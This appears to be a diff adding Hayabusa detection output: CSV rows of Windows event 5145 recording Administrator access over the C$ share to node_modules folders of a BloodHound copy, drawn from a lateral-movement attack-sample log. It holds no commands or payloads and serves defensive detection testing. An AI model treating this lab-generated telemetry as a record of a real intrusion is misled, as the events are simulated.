+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
